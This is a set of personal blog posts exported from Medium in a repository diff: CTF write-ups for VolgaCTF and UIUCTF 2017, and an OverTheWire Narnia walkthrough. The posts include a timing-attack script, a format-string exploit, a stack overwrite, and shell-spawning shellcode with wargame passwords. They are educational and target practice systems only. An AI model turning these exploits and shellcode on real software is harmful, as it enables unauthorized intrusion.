<p name="e3cc" id="e3cc" class="graf graf--p graf-after--h3">I participated in VolgaCTF under the team Shell
Smash. We finished in 138th place with 600 points. Here are the write-ups for the problems that I did.</p>
<h3 name="bb61" id="bb61" class="graf graf--h3 graf-after--p">VC (50 points)</h3>
<p name="f5dc" id="f5dc" class="graf graf--p graf-after--h3">This was a pretty standard image analysis
problem. We are given two images that are relatively similar, except for a couple of bytes. If we just xor
the two images together, the flag appears in plain sight.</p>
<figure name="dee3" id="dee3" class="graf graf--figure graf--iframe graf-after--p">
<script src="https://gist.github.com/failedxyz/a7958fd7b5fff2c7b04de034cb9bc199.js"></script>
</figure>
<h3 name="1171" id="1171" class="graf graf--h3 graf-after--figure">PyCrypto (100 points)</h3>
<p name="3968" id="3968" class="graf graf--p graf-after--h3">We are given a Python file with an encrypt
function. Its using an encryption function from the <code
class="markup--code markup--p-code">pycryptography.so</code> library that was also given. By analyzing
the so, it looks like the encryption algorithm is simply an xor with the key, and if the key is shorter
than the message, then just repeat the key. This algorithm is known as a vigenère cipher, or repeating-key
xor cipher. Fortunately, I had some old code to crack this type of cipher exactly from cryptopals.</p>
<figure name="a89f" id="a89f" class="graf graf--figure graf--iframe graf-after--p">
<script src="https://gist.github.com/failedxyz/425c663e1cb56caa328a1e263ec1565e.js"></script>
</figure>
<h3 name="df11" id="df11" class="graf graf--h3 graf-after--figure">Angry Guessing Game (200 points)</h3>
<p name="9dc1" id="9dc1" class="graf graf--p graf-after--h3">The first step was to open this binary in IDA.
Its easy to get lost, because there are so many functions, so the first thing I did was hit Shift+F12 and
look at the strings. The one I was looking for, in particular, was “Youve entered the correct license
key!” If I found where this was called during execution, I could trace it back to the actual place where
it performs the check.</p>
<figure name="ca83" id="ca83" class="graf graf--figure graf-after--p"><img class="graf-image"
data-image-id="1*tOWToDf10V2YnUScoVAlhg.png" data-width="972" data-height="144"
src="https://cdn-images-1.medium.com/max/800/1*tOWToDf10V2YnUScoVAlhg.png">
<figcaption class="imageCaption">Using the strings to follow execution.</figcaption>
</figure>
<p name="4cd9" id="4cd9" class="graf graf--p graf-after--figure">Here you can see Ive found that sub_5F70
contains the code that checks whether youve already played 3 times, and tells the program to start asking
for a license key. Should it ask for a license key, it will redirect the execution to sub_6660, where it
actually prompts the user.</p>
<p name="990a" id="990a" class="graf graf--p graf-after--p">Im going to start from the bottom of sub_6660,
trying to follow what its returning, because ultimately the result of this function is either going to be
true/falsewhether it accepts your license key. Poking around, I found this call to an interesting
function: sub_67D0. Seems like its literally just checking your license key character by character.</p>
<figure name="e892" id="e892" class="graf graf--figure graf-after--p"><img class="graf-image"
data-image-id="1*m6YBCqASg66wa1I6IXlRtQ.png" data-width="484" data-height="776"
src="https://cdn-images-1.medium.com/max/800/1*m6YBCqASg66wa1I6IXlRtQ.png">
<figcaption class="imageCaption">The license key checker.</figcaption>
</figure>
<p name="ced2" id="ced2" class="graf graf--p graf-after--figure">I wonder what happens if you just convert
all of those values to ASCII?</p>
<figure name="fd19" id="fd19" class="graf graf--figure graf-after--p"><img class="graf-image"
data-image-id="1*KkjogeoBtk7d3Z-cslOu6w.png" data-width="667" data-height="785"
src="https://cdn-images-1.medium.com/max/800/1*KkjogeoBtk7d3Z-cslOu6w.png">
<figcaption class="imageCaption">The letters of the flag.</figcaption>
</figure>
<p name="780e" id="780e" class="graf graf--p graf-after--figure">Looks like our license key is the flag!</p>
<h3 name="25ef" id="25ef" class="graf graf--h3 graf-after--p">KeyPass (100 points)</h3>
<p name="ee4c" id="ee4c" class="graf graf--p graf-after--h3">I didnt actually finish this one during the
competition time, because I was being really stupid and not reading their hint. In this challenge, they
handed out an encrypted flag and a program that “generates secure encryption keys.”</p>
<p name="53fd" id="53fd" class="graf graf--p graf-after--p">Picking apart the binary, it looks like what the
program is doing is just generating a seed out of the passphrase that you give to it, by xoring every
character of your passphrase together. This was then used in an LCG to get “random” bytes out of a
dictionary of 82 bytes.</p>
<p name="4045" id="4045" class="graf graf--p graf-after--p">The problem with this method is, there a total
of about 128 values for this “seed,” because ASCII values range from 0 to 128, and since higher bits are
not involved, xor will never go out of that range either. So to solve the problem, you simply generate all
of the keys for seeds from 0 to 128. Ive reimplemented the key generation in Python here:</p>
<figure name="0cc9" id="0cc9" class="graf graf--figure graf--iframe graf-after--p">
<script src="https://gist.github.com/failedxyz/1cbc3a63152d095dca58f7b6d89a8b77.js"></script>
</figure>
<p name="acb2" id="acb2" class="graf graf--p graf-after--figure graf--trailing">So why couldnt I finish it?
Because when I was actually checking the key with <code
class="markup--code markup--p-code">openssl aes-128-cbc -d -in flag.zip.enc -out flag.zip -pass env:PASSWORD</code>,
I wasnt using the version of OpenSSL that they specified, version 1.1.0e. Lesson learned, I guess.</p>
</div>
</div>
</section>
</section>
<footer>
<p>By <a href="https://medium.com/@failedxyz" class="p-author h-card">Michael Zhang</a> on <a
href="https://medium.com/p/632fa7821dca"><time class="dt-published" datetime="2017-03-26T21:52:31.553Z">March
26, 2017</time></a>.</p>
<p><a href="https://medium.com/@failedxyz/volgactf-2017-writeups-632fa7821dca" class="p-canonical">Canonical
link</a></p>
<p>Exported from <a href="https://medium.com">Medium</a> on October 8, 2024.</p>
</footer>
</article>

117
src/content/posts/2017-05-01_UIUCTF-2017-Writeups.md Normal file
View file

@ -0,0 +1,117 @@
---
title: UIUCTF 2017 Writeups
date: 2017-05-01T00:09:47.978Z
tags: [medium-blog]
---
<article class="h-entry">
<section data-field="body" class="e-content">
<section name="edd2" class="section section--body section--first section--last">
<div class="section-content">
<div class="section-inner sectionLayout--insetColumn">
<p name="dca1" id="dca1" class="graf graf--p graf-after--h3">I competed in UIUCTF this year with Aaron Cao.
We ended up placing 23rd with 1300 points. Here are some of the solutions to the challenges I solved.</p>
<h3 name="f21d" id="f21d" class="graf graf--h3 graf-after--p">High School Crypto (100 points, crypto)</h3>
<p name="5d6b" id="5d6b" class="graf graf--p graf-after--h3">In this challenge, we are basically given some
encrypted information, as well as the following encryption program.</p>
<pre name="d6b3" id="d6b3"
class="graf graf--pre graf-after--p">import sys, itertools<br>if(len(sys.argv) != 3):<br> print(&quot;Usage: [FILE] [KEY]&quot;)<br> exit(-1)<br><br>filename = sys.argv[1]<br>key = sys.argv[2]<br><br>with open(filename, &#39;rb&#39;) as plaintext:<br> raw = plaintext.read()<br> print(len(raw))<br> with open(filename + &#39;.out&#39;, &#39;wb&#39;) as ciphertext:<br> for l, r in zip(raw, itertools.cycle(key)):<br> ciphertext.write( (l ^ ord(r)).to_bytes(1, byteorder=&#39;big&#39;) )</pre>
<p name="2402" id="2402" class="graf graf--p graf-after--pre">Upon not-so-close inspection, it seems like
its just a repeated-xor cipher. Using code that I had written for Cryptopals Set 1, I decoded it quickly,
obtaining a long plaintext, containing the flag.</p>
<h3 name="1b1a" id="1b1a" class="graf graf--h3 graf-after--p">Thematic (100 points, recon)</h3>
<p name="318b" id="318b" class="graf graf--p graf-after--h3"><a
href="https://twitter.com/SwiftOnSecurity/status/858092845886046209"
data-href="https://twitter.com/SwiftOnSecurity/status/858092845886046209"
class="markup--anchor markup--p-anchor" rel="nofollow noopener"
target="_blank">https://twitter.com/SwiftOnSecurity/status/858092845886046209</a></p>
<h3 name="f8de" id="f8de" class="graf graf--h3 graf-after--p">Taylors Magical Flag Oracle (150 points,
reversing)</h3>
<p name="6c04" id="6c04" class="graf graf--p graf-after--h3">Were given a flag-checking service that seems
to be vulnerable to timing attack. In essence, heres what happens: the service checks our flag character
by character; if that character is the same, move on to the next, otherwise, just return false, since we
know that the string cant be equal anyway. But in this case, the program delays by 0.25a significant
amount!before moving on, to prevent brute force? apparently. But theres one huge flaw.</p>
<p name="939a" id="939a" class="graf graf--p graf-after--p">If you brute force all of the possibilities for
the <em class="markup--em markup--p-em">next character</em>, theres going to be a significant time gap
between returns if you submit the right character vs. if you submit the wrong one. Heres what it means:
say I know the flag starts with <code class="markup--code markup--p-code">flag{</code> , which I do. Upon
submitting <code class="markup--code markup--p-code">flag{</code>, I know its going to be delaying for at
least 5 * 0.25, which is 1.25 seconds. I dont know the 6th character yet, but theres only 2 things that
can happen:</p>
<ul class="postList">
<li name="69d8" id="69d8" class="graf graf--li graf-after--p">I get it wrong; the program returns
immediately because it doesnt hit the sleep, and my result is return in ~1.25 seconds, with a bit of
latency, but not enough to make it &gt;1.5 seconds.</li>
<li name="95b5" id="95b5" class="graf graf--li graf-after--li">I get it right; the program sleeps for 0.25
before moving on because the pass has checked.</li>
</ul>
<p name="2016" id="2016" class="graf graf--p graf-after--li">Hopefully the problem becomes obvious now. If I
check how long it takes me to get my result, Ill be able to “guess” the password character by character.
Knowing this, here is the script I used to get the flag:</p>
<pre name="f905" id="f905"
class="graf graf--pre graf-after--p">import socket<br>from functools import wraps<br>from time import time<br>from string import printable</pre>
<pre name="4d70" id="4d70"
class="graf graf--pre graf-after--pre">addr = (&quot;challenge.uiuc.tf&quot;, 11340)<br>s = socket.socket()<br>s.connect(addr)</pre>
<pre name="05be" id="05be"
class="graf graf--pre graf-after--pre">def stopwatch(f):<br> <a href="http://twitter.com/wraps" data-href="http://twitter.com/wraps" class="markup--anchor markup--pre-anchor" title="Twitter profile for @wraps" rel="noopener" target="_blank">@wraps</a>(f)<br> def wrapper(*args, **kwargs):<br> start = time()<br> result = f(*args, **kwargs)<br> end = time()<br> return end - start<br> return wrapper</pre>
<pre name="017f" id="017f"
class="graf graf--pre graf-after--pre"><a href="http://twitter.com/stopwatch" data-href="http://twitter.com/stopwatch" class="markup--anchor markup--pre-anchor" title="Twitter profile for @stopwatch" rel="noopener" target="_blank">@stopwatch</a><br>def test_flag(flag):<br> global s<br> s.send(flag + &quot;\n&quot;)<br> s.recv(20) # &gt;</pre>
<pre name="4624" id="4624"
class="graf graf--pre graf-after--pre">s.recv(20) # &gt;<br>known_flag = &quot;flag{&quot;<br>while True:<br> for c in printable:<br> benchmark = 0.25 * (len(known_flag) + 1)<br> actual = test_flag(known_flag + c)<br> print c, benchmark, actual<br> if actual &gt; benchmark:<br> known_flag += c<br> print known_flag<br> break</pre>
<h3 name="0dea" id="0dea" class="graf graf--h3 graf-after--pre">babyrsa (200 points, crypto)</h3>
<pre name="c0da" id="c0da"
class="graf graf--pre graf-after--h3">n = 826280450476795403105390383916395625701073920777162153138597185953056944510888027904354828464602421249363674719063026424044747076553321187265165775178889032794638105579799203345357910166892700405175658568627675449699540840288382597105404255643311670752496397923267416409538484199324051251779098290351314013642933189000153869540797043267546151497242578717464980825955180662199508957183411268811625401646070827084944007483568527240194185553478349118552388947992831458170444492412952312967110446929914832061366940165718329077289379496793520793044453012845571593091239615903167358140251268988719634075550032402744471298472559374963794796831888972573597223883502207025864412727194467531305956804869282127211781893423868568924921460804452906287133831167209340798856323714333552031073990953099946860260440120550744737264831895097569281340675979651355169393606387485601024283179141075124116079680183641040638005340147490312370291020282845417263785200481799143148652902589069064306494803532124234850362800892646823909347208346956741220877224626765444423081432186871792825772139369254830825377015531518313838382717867736340509229694011716101360463757629023320658921011843627332643744464724204771008866440681008984222122706436344770910544932757<br>e = 5<br>c = 199037898049081148054548566008626493558290050160287889209057083223407180156125399899465196611255722303390874101982934954388936179424024104549780651688160499201410108321518752502957346260593418668796624999582838387982430520095732090601546001755571395014548912727418182188910950322763678024849076083148030838828924108260083080562081253547377722180347372948445614953503124471116393560745613311509380885545728947236076476736881439654048388176520444109172092029548244462475513941506675855751026925250160078913809995564374674278235553349778352067191820570404315381746499936539482369231372882062307188454140330786512148310245052484671692280269741146507675933518321695623680547732771867757371698350343979932499637752314262246864787150534170586075473209768119198889190503283212208200005176410488476529948013610803040328568552414972234514746292014601094331465138374210925373263573292609023829742634966280579621843784216908520325876171463017051928049668240295956697023793952538148945070686999838223927548227156965116574566365108818752174755077045394837234760506722554542515056441166987424547451245495248956829984641868331576895415337336145024631773347254905002735757</pre>
<p name="2839" id="2839" class="graf graf--p graf-after--pre">Standard RSA challenge, were given N, e, and
c and were asked to find the original message… Its supposed to be a “baby” RSA challenge, so one thing
that came to mind was that m^e is actually <em class="markup--em markup--p-em">less</em> than N. I put the
ciphertext c into factordb.com, and it turned out that it was a perfect fifth power! (recall that e=5).
The problem became trivial at this point; to get the flag, simply convert the fifth root of c back into
ASCII.</p>
<h3 name="d90e" id="d90e" class="graf graf--h3 graf-after--p">goodluck (200 points, pwn)</h3>
<p name="6b0f" id="6b0f" class="graf graf--p graf-after--h3">This challenge was pretty straightforward; once
I opened it in IDA, I noticed that it was <code class="markup--code markup--p-code">printf</code>ing some
user-supplied input. I tried a bunch of values with the binary locally until I got the exploit string
<code class="markup--code markup--p-code">%9$s</code>, which prints the 9th string on the stack (which is
where <code class="markup--code markup--p-code">flag.txt</code> was read to).
</p>
<pre name="c548" id="c548"
class="graf graf--pre graf-after--p">michael@zhang:~$ echo “%9\$s” | nc challenge.uiuc.tf 11342 <br>whats the flag <br>You answered: <br>flag{always_give_110%} <br>But that was totally wrong lol get rekt</pre>
<h3 name="62c9" id="62c9" class="graf graf--h3 graf-after--pre">LSLolLog in, stay here (200 points,
reversing)</h3>
<p name="f237" id="f237" class="graf graf--p graf-after--h3">To be honest, I dont even know how I solved
this one. I think I created an account and just tried a bunch of random stuff until I was at the location
indicated in the <code class="markup--code markup--p-code">X-SecondLife-Local-Position</code> header in
the URL I was given.</p>
<h3 name="5f73" id="5f73" class="graf graf--h3 graf-after--p">snekquiz (200 points, pwn)</h3>
<p name="4ea6" id="4ea6" class="graf graf--p graf-after--h3">In this challenge, we arent given a binary,
just a server to connect to. So we kind of have to imagine how its programmed. The server asks us 3
questions, then reveals us the answers so we can get all 3 right the next time. But we need a score of 5
to get the flag!</p>
<p name="05bc" id="05bc" class="graf graf--p graf-after--p">I imagine that the score variable must be in the
local scope of whatever function is doing the input loop. If thats the case, we can definitely overwrite
it, since buffer length is not being checked. Apparently stack protector has been enabled so we wont be
able to write out of the stack frame, but that doesnt really matter since we arent even given a binary
to work with.</p>
<p name="e0ba" id="e0ba" class="graf graf--p graf-after--p">After trying a bunch of values, I got that 88
was the maximum number of <code class="markup--code markup--p-code">A</code>s I was allowed to send to the
server before I started writing over the canary. I got a message that looked like this:</p>
<pre name="d225" id="d225"
class="graf graf--pre graf-after--p">Score greater than 5 detected! You must be cheating with a score like 1094795585</pre>
<p name="0858" id="0858" class="graf graf--p graf-after--pre graf--trailing">(for reference, that number is
0x41414141). That means score is being scored in an int. This time, I sent <code
class="markup--code markup--p-code">\x05\x00\x00\x00</code> 22 times, hoping that it would overwrite the
score variable with the exact value of 5, and it did!</p>
</div>
</div>
</section>
</section>
<footer>
<p>By <a href="https://medium.com/@failedxyz" class="p-author h-card">Michael Zhang</a> on <a
href="https://medium.com/p/a53aabe1bc56"><time class="dt-published" datetime="2017-05-01T00:09:47.978Z">May 1,
2017</time></a>.</p>
<p><a href="https://medium.com/@failedxyz/uiuctf-2017-writeups-a53aabe1bc56" class="p-canonical">Canonical
link</a></p>
<p>Exported from <a href="https://medium.com">Medium</a> on October 8, 2024.</p>
</footer>
</article>

41
src/content/posts/2017-05-24_OverTheWire--Narnia.md Normal file
View file

@ -0,0 +1,41 @@
---
title: "OverTheWire: Narnia"
date: 2017-05-24T03:10:36.500Z
tags: [medium-blog]
---
<article class="h-entry">
<section data-field="body" class="e-content">
<section name="6f76" class="section section--body section--first section--last">
<div class="section-content">
<div class="section-inner sectionLayout--insetColumn">
<h3 name="1811" id="1811" class="graf graf--h3 graf-after--h3">Level 0: Simple Buffer Overflow</h3>
<p name="0218" id="0218" class="graf graf--p graf-after--h3">Were given a buffer of 20 characters and an
int. The program reads 24 characters from input, exactly overwriting the int. The exploit code:</p>
<pre name="47f8" id="47f8"
class="graf graf--pre graf-after--p">(python -c print “\xef\xbe\xad\xde” * 6; cat) | ./narnia0</pre>
<p name="b867" id="b867" class="graf graf--p graf-after--pre">The password for level 1 is <code
class="markup--code markup--p-code">efeidiedae</code>.</p>
<h3 name="59e6" id="59e6" class="graf graf--h3 graf-after--p">Level 1: Executing Shellcode</h3>
<p name="d660" id="d660" class="graf graf--p graf-after--h3">The program were given will execute anything
at the environment variable <code class="markup--code markup--p-code">EGG</code> as a function pointer; I
found some shellcode from google and it worked. The exploit code:</p>
<pre name="a253" id="a253"
class="graf graf--pre graf-after--p">EGG=$(printf “\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\x<br>ff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81”) bash -c ./narnia1</pre>
<p name="5af8" id="5af8" class="graf graf--p graf-after--pre">The password for level 2 is <code
class="markup--code markup--p-code">nairiepecu</code>.</p>
<p name="3a3b" id="3a3b" class="graf graf--p graf-after--p">Level 2</p>
<p name="ce56" id="ce56" class="graf graf--p graf-after--p graf--trailing">soon lol</p>
</div>
</div>
</section>
</section>
<footer>
<p>By <a href="https://medium.com/@failedxyz" class="p-author h-card">Michael Zhang</a> on <a
href="https://medium.com/p/a282ef43b705"><time class="dt-published" datetime="2017-05-24T03:10:36.500Z">May
24, 2017</time></a>.</p>
<p><a href="https://medium.com/@failedxyz/overthewire-narnia-a282ef43b705" class="p-canonical">Canonical link</a>
</p>
<p>Exported from <a href="https://medium.com">Medium</a> on October 8, 2024.</p>
</footer>
</article>

37
src/content/posts/2024-10-07-old-blog-posts.md Normal file
View file

@ -0,0 +1,37 @@
---
title: Old blog posts
date: 2024-10-07T22:40:16-05:00
tags: [life, medium-blog]
---
Just re-discovered an [old blog][1] I had written over at Medium from back around 2017.
[1]: https://medium.com/michaels-blog
For completeness' sake I migrated them over to this blog, while still keeping links to the originals.
This means I've been blogging for almost 10 years in total!
I'm grateful that Medium was able to keep this around for all this time.
Even though some of it is quite embarassing to look back at, it's kind of like peering into a time capsule and seeing what I was up to in the past.
I'm also really glad I did a post-mortem of at least one iteration of EasyCTF, since I had stupidly lost all of the actual competition data :frown:
Here are the links to the old posts:
- [`[2017-05-24]` OverTheWire: Narnia](/posts/2017-05-24_overthewire--narnia/)
- [`[2017-05-01]` UIUCTF 2017 Writeups](/posts/2017-05-01_uiuctf-2017-writeups/)
- [`[2017-03-26]` VolgaCTF 2017 Writeups](/posts/2017-03-26_volgactf-2017-writeups/)
- [`[2017-03-24]` EasyCTF 2017 Wrap-up](/posts/2017-03-24_easyctf-2017-wrap-up/)
- [`[2017-02-16]` So, you can detect whether I use an ad-blocker or not, eh?](/posts/2017-02-16_so--you-can-detect-whether-i-use-an-ad-blocker-or-not--eh/)
- [`[2017-01-14]` Why I think HTML is a programming language.](/posts/2017-01-14_why-i-think-html-is-a-programming-language/)
- [`[2017-01-07]` Watch out, returning users!](/posts/2017-01-07_watch-out--returning-users/)
- [`[2017-01-03]` Wi-Fi Problems when Installing Linux on ASUS machines.](/posts/2017-01-03_wi-fi-problems-when-installing-linux-on-asus-machines/)
- [`[2016-12-30]` XinIRC development.](/posts/2016-12-30_xinirc-development/)
- [`[2016-12-01]` Lightning Speed Run.](/posts/2016-12-01_lightning-speed-run/)
- [`[2016-10-02]` H4CK1T CTF 2016.](/posts/2016-10-02_h4ck1t-ctf-2016/)
- [`[2016-09-18]` CSAW CTF 2016 Quals.](/posts/2016-09-18_csaw-ctf-2016-quals/)
- [`[2016-09-07]` So. I started a blog.](/posts/2016-09-07_so--i-started-a-blog/)
- [`[2015-10-20]` Pwnable.kr: fd (1).](/posts/2015-10-20_pwnable-kr--fd--1/)
- [`[2015-03-19]` A Much-Needed Apology.](/posts/2015-03-19_a-much-needed-apology/)
- [`[2014-12-18]` How to accomplish something.](/posts/2014-12-28_how-to-accomplish-something/)